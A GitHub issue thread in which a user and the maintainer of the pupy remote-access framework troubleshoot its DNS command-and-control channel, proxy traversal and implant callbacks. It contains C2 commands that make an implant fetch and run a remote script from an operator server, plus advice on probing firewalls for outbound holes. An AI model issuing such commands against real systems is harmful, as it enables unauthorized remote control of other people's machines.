### ISSUE TITLE
DNSCNC Question

### ISSUE THREAD

**Issue by S3cur3Th1sSh1t** [alxchk/pupy#21]
Hi,

i finally got the dnscnc option working here but have a question regarding to the exec/pyexec module. Is it only possible to specify an executable from an URL to be executed? Cant i just execute single commands? The parameter URL seams to be required here.

Is it planed to update the dnscnc capabilities in the future?

Greetings

**Comment by S3cur3Th1sSh1t** [comment]
Just using a python script for example is possible like:
```
import os
os.system('calc.exe');

```
And:dnscnc dexec -a pyexec -u http://URL/test.py

But direct OS command execution without http/https traffic is not an option?

**Comment by alxchk** [comment]
DNSCNC is only to coordinate main payload in case environment has been changed. Protocol tuned to be small and reliable (i.e. messages should fit to the UDP packet size which will be forwarded with high probability). Arguments are packed in various ways to make size as small as possible (with some security of course). 

While technically it's possible to add feature to pass long commands (and maybe even receive the output), in real world it's not very useful, because any further complex things (recon, commands etc) will require large data transfers. I am strictly against abusing pulbic resources (such as DNS) this way. Also pushing DNS techinques everywhere motivates blue teamers to monitor DNS more carefully :]

Typical use-case of dnscnc is to answer questions like:
1. Where I am?
2. Can I communicate to the internet?
3. Can I communicate with some place which I can control?
4. If not - give up and shutdown.

**Comment by S3cur3Th1sSh1t** [comment]
Ok thanks for the answer. This already helps me. :)

**Comment by S3cur3Th1sSh1t** [comment]
One more question. What if i am stuck on a system and cannot get a callback because its using a proxy with NTLM authentication?

I saw that i can use the following:

dnscnc -n NODEID proxy http(s)://USER:Password@PROXYIP:PORT - but thats basically not NTLM authentication - which most environments use. I tried setting the proxy and connecting afterwards in the hope, that the current user creds are used but that did not work in my environment.

dnscnc -n NODEID connect -c IP -p PORT -t TRANSPORT 

There is no way of executing commands without going out through the proxy right?

Greetings

**Comment by alxchk** [comment]
Parts with proxies/creds/wpads etc are not very common, so they are not tested well. I will be very happy if you can debug this out (if it's possible of course).

Several notes about proxies.

First of all, I it /should/ support NTLM/Negotiate and SSPI. At least in my environments this works. BUT this may have bugs :)

There is auto-detection of various proxy settings. You can check file pupy/network/lib/proxies.py

There is auto-detection of authentication methods. You can check file pupy/network/lib/socks.py
Please note, that while it looks like socksi.py, it was rewritten a lot.

I use own lib to perform SSPI/network auth - https://github.com/alxchk/urllib-auth 
This also includes some forked/patched things like ccs-kerberos etc.

There is support for proxy chains.

DNSCNC by default configured to build proxy chain :) So in case you run proxy command serveral times, the result may be a bit different from what you expect to see.  You can check file pupy/pupylib/PupyDnsCnc.py (proxy related part)


You need to do first something like
```
dnscnc proxy none
```
To reset the chain

```
dnscnc proxy any
```

should enable autodetection.  But if you didn't get you connection, likely it fails to detect valid creds/server.

In any case, if HTTP proxy requires authentication, urllib-auth will try known passwords to authenticate first. Or will use SSPI (i.e. current user creds). 
In case this didn't work, one of next things may happen:

1. Error during processing proxy server reponse (very likely)
2. Missing credentials / broken SSPI (very likely)
3. Error during authentication handshake (likely)

So, If you are able to interact with module somehow, I suggest to enable and collect logs from debug payload. Logs should have information about proxy selections attempts.

If you are not able to interract, I need very exact information about environment to be able to prepare similar and to try to reproduce.

**Comment by S3cur3Th1sSh1t** [comment]
Ok. I first tried to reset the proxy chain now.

dnscnc proxy none worked fine

dnscnc proxy any throws the following error message:
`
[-] Traceback (most recent call last):
  File "/opt/tools/pupy/pupy/pupylib/PupyCmd.py", line 429, in cmdloop
    cmd.Cmd.cmdloop(self, intro)
  File "/usr/lib/python2.7/cmd.py", line 142, in cmdloop
    stop = self.onecmd(line)
  File "/usr/lib/python2.7/cmd.py", line 220, in onecmd
    return self.default(line)
  File "/opt/tools/pupy/pupy/pupylib/PupyCmd.py", line 378, in default
    return self.execute(line)
  File "/opt/tools/pupy/pupy/pupylib/PupyCmd.py", line 394, in execute
    clients_filter)
  File "/opt/tools/pupy/pupy/commands/__init__.py", line 130, in execute
    command.do(server, handler, config, parsed_args)
  File "/opt/tools/pupy/pupy/commands/dnscnc.py", line 549, in do
    default=args.default
  File "/opt/tools/pupy/pupy/pupylib/PupyDnsCnc.py", line 432, in proxy
    return self.dns_handler.proxy(*args, **kwargs)
  File "/opt/tools/pupy/pupy/pupylib/PupyDnsCnc.py", line 184, in proxy
    password=parsed.password
  File "/opt/tools/pupy/pupy/network/lib/picocmd/picocmd.py", line 485, in __init__
    socket.gethostbyname(ip)
gaierror: [Errno -2] Name or service not known
`
In this environment there is proxy auto detection configured in the internet explorer settings, so from my understanding the proxy configuration should be gathered as WPAD file.
My user has proxy rights, the credentials should not be the problem.

I´ll take a look at the mentioned python files to see whats happening here. Maybe you see something by looking at the exception.

**Comment by alxchk** [comment]
This exception is not from the client. Because dnscnc payloads are as short as possible, hostnames are translated to the IP addresses first :) This hostname can not be resolved from pupysh side, so it's failed.
I.e. this means that command was not even send to the client.

**Comment by S3cur3Th1sSh1t** [comment]
My questions may be a little noobish here but - which hostname should be resolved here on the pupy side?

**Comment by S3cur3Th1sSh1t** [comment]
from /pupy/pupylib/PupyDnsCnc.py:
`    def proxy(self, uri, node=None, default=False):
        if not uri or uri.lower() in ('none', 'off', 'no', 'disable'):
            return self.add_command(
                SetProxy('none', '0.0.0.0', 0),
                session=node, default=default
            )
        elif uri.lower() in ('on', 'enable', 'yes'):
            return self.add_command(
                SetProxy('any', '0.0.0.0', 0),
                session=node, default=default
            )`

I think thats the part.

`dnscnc proxy` on or `dnscnc proxy enable` works fine here. So the command for proxy enable is another one.

So i did reset the proxy chain now but still cannot connect my node afterwards. My Debug log shows the following for the node:

`
2020-02-28 11:16:42,239|DEBUG| 45883|Thread-1|pupy.dnscnc| command={SYS: OS=Windows ARCH=x64 NODE=005056B94AB5 IP=IPADRESS INTERNET=True BOOT=Sun Feb 23 00:27:19 2020}/SystemInfo session=e69a73f3 / node commands=False / node = 005056b94ab5 / cid = 49ee2399 / iid = 7448
`

So Internet=True means the system has internet access over the IP in the log?

**Comment by alxchk** [comment]
Yes, it's looks like it manages to connect to the internet. IP=ADDRESS received from various internet services, which returns you your IP address. You can find this code at npupy/network/lib/online.py (external_ip)

So, what exactly do you mean saying that 
```
dnscnc proxy on or dnscnc proxy enable works fine here.
```

Can you receive connection, or just nothing failed?

**Comment by S3cur3Th1sSh1t** [comment]
`Can you receive connection, or just nothing failed?`

Nothing failed.
When i try to connect the node afterwards there is still no incoming connection. Is it possible to manually add credentials to the Cred-Database, so that some more users for the proxy can be uses/tried?

**Comment by alxchk** [comment]
By default there is no way to do so.
I suggest to do next things.

If you **do** have access to the filesystem where you are trying to run payload, you can use payload built with `--debug` arg and check the logs.

If you don't have access, try next things.
1. Try `onlinestatus` command. It takes some (significant) amount of time. After record in `info` will change color, you can use `extra` to check result. There will be two results. First one - general info, second one - ports it's manged to _connect_ via `portquiz.net`. There will be significant delay between first and second result.
2. If you have any VDS/VPS you control, try `dexec` command to check, can payload connect to you or not using **HTTP** protocol.
3. If you have any VDS/VPS you control, you also may try `scan` command. This command does not support proxies, but you can try to search holes in FW, watching network using tcpdump on VDS side.
 
It's very common situation, when firewalls/proxies filters connections by port/protocol. Maybe your proxy only allows HTTP:80 and HTTP+mitm:443.

**Comment by S3cur3Th1sSh1t** [comment]
Ok now i got some more information. It seams to be not a proxy or internet connection related issue.

I just executed the following:
`
dnscnc dexec -a pyexec -u http://MYIP:8000/test.py
`
And got an incoming connection to my webserver for the file. 

dnscnc connect to same port with http procotol - fails. Thats strange. Im going to test here some more. I tried this for more than one host in the environment. Some do nothing, and for some i get the following new error:

`Traceback (most recent call last):
  File "/opt/tools/pupy/pupy/network/lib/transports/http.py", line 324, in downstream_recv
    newdata = self.http_req2data(req)
  File "/opt/tools/pupy/pupy/network/lib/transports/http.py", line 285, in http_req2data
    raise MalformedData('invalid user agent')
MalformedData: invalid user agent`

Maybe the proxy is manipulating the User-Agent which results in no connection?

Running TCPDUMP i see, that there are several connection attempts for the C2 Server:
`
 HTTP: GET /index.php?d=poll&_=1582888110.57 HTTP/1.1
`

**Comment by alxchk** [comment]
This may be. Generally you can disable UA verification (verify_user_agent), but i'm not sure this will works proprely when you start this from DNSCNC.

Please note, that HTTP transport in pupy right now is quite bad. I'm slowly rewriting all that things, but result will not be ready in next month(s).

I'm pretty sure that HTTPS should work in your environment. Unless it's really heavily restricted. So you may try ws/wss transports (websockets) and something like ec4. 

Do you have output from `onlinestatus` ?

**Comment by S3cur3Th1sSh1t** [comment]
I used HTTP so that i can see all connection details.

Here is my Wireshark HTTP Stream:

GET /index.php?d=poll&_=1582888299.21 HTTP/1.1
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Host: RedirectorSERVERIP
X-IMForwards: 20
Via: 1.1 PROXYSERVERIP
X--------------: 1.1.1.1   

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Server: Apache
Content-Length: 0
X-Poll-Required: true

Seams to be a valid User-Agent. Are there some Connection Details like Parameters, Headers ETC missing?

Im also going to try other transports. Onlinestatus works, but the command extra is not returning any new output.

**Comment by alxchk** [comment]
Yeah, a bit unclear. Maybe failed to parse header? Can you put some prints to http_req2data (pupy/network/lib/transports/http.py)? Also try to disable (comment out) UA verification there.

You need to restart pupysh after that changes  (will not be reloaded dynamically)

**Comment by S3cur3Th1sSh1t** [comment]
Update: ec4 Protocol works properly, i got some sessions. But only for half of the dns nodes. Its not explaining the http errors but for the moment its a workaround.

@edit: lost all sessions again, reconnect not possible over ec4. I know the proxy URL and have credentials for it, cant i specify the proxy manually like
dnscnc proxy http://url:port/ ? Keep getting errors there

ONLINE STATUS

KEY                VALUE
----------------------------
ONLINE             FALSE
IGD                FALSE
HOTSPOT            FALSE
DNS                TRUE
NTP                FALSE
DIRECT DNS         TRUE
HTTP               FALSE
HTTPS              FALSE
HTTPS NO CERT      FALSE
HTTPS MITM         TRUE
PROXY              FALSE
TRANSPARENT PROXY  FALSE
STUN               BLOCKED
MINTIME            0.000S
NTP OFFSET         N/A

PASTES STATUS

KEY                             VALUE
---------------------------------------
https://lpaste.net              False
https://pastebin.com            False
https://friendpaste.com         False
http://vpaste.net               False
http://ix.io                    False
https://hastebin.com            False
http://paste.openstack.org      False
https://ghostbin.com            False
https://phpaste.sourceforge.io  False
http://dpaste.com               False

**Comment by S3cur3Th1sSh1t** [comment]
It was not a pupy side Problem here. I got the connections back later using ec4 again.
